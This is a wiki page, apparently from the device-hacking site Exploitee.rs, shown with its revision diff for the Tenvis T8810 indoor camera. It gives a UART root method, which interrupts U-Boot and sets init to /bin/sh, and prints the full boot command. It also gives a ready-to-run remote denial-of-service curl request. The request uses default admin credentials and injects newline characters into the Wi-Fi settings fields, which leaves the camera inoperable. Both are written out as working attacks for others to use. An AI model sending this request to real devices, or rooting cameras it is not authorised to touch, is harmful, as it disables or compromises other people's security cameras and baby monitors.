Difference between revisions of "Tenvis T8810"

From Exploitee.rs
Jump to navigationJump to search
 
(One intermediate revision by one other user not shown)
Line 11: Line 11:
[https://www.amazon.com/Indoor-Security-Camera-Baby-Monitor/dp/B01MFBBYO8/ref=cm_cd_al_qh_dp_t?tag=exploiteers-20 Purchase the Tenvis T8810 at Amazon]
[https://www.amazon.com/Indoor-Security-Camera-Baby-Monitor/dp/B01MFBBYO8/ref=cm_cd_al_qh_dp_t?tag=exploiteers-20 Purchase the Tenvis T8810 at Amazon]


==Hardware Root==
==UART Root==
The UART interface on this device is located [pictured], and runs at ?????????? and auto boots after a three second delay. A root shell can be accessed by interrupting auto boot and hijacking the init environment variable, setting it to /bin/sh
The UART interface on this device is located on the main board, above the power connector [pictured], and runs at 115200, 8n1 and auto boots to a Linux kernel after a three second delay in U-Boot. A root shell can be accessed by interrupting auto boot and hijacking the init environment variable, setting it to /bin/sh, as seen below:


<pre style="white-space: pre-wrap;">
<pre style="white-space: pre-wrap;">
Line 21: Line 21:
TENVIS_T8110_UART.JPG
TENVIS_T8110_UART.JPG
</gallery>
</gallery>
=== Demo ===
{{#ev:youtube|nxnVUVMNO5Y}}


==Remote Denial of Service==
==Remote Denial of Service==

Latest revision as of 01:08, 11 August 2017

"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."

TENVIS T8110.JPG

Tenvis T8810

Purchase

Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. Purchase the Tenvis T8810 at Amazon

UART Root

The UART interface on this device is located on the main board, above the power connector [pictured], and runs at 115200, 8n1 and auto boots to a Linux kernel after a three second delay in U-Boot. A root shell can be accessed by interrupting auto boot and hijacking the init environment variable, setting it to /bin/sh, as seen below:

setenv bootargs console=${consoledev},${baudrate} noinitrd mem=${mem} rw ${rootfstype} init=/bin/sh ;sf probe 0 0;sf read ${loadaddr} ${sfkernel} ${filesize}; bootm

Demo

Remote Denial of Service

WARNING

This will leave your device in an unusable state until recovered via UART. Proceed at your own peril.

Sending the following request will cause the device to crash, and remain in an inoperable state until recovered.

curl 'http://192.168.1.88/cgi-bin/hi3510/param.cgi' -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' --data 'cmd=setwirelessattr&cururl=http%3A%2F%2F192.168.1.88%2Fwifi.html&-wf_ssid=%0Assidgoesheres%0D&-wf_auth=3&-wf_mode=%0Dabcdef&-wf_enc=0&-wf_enable=1&-wf_key=key12345' --compressed​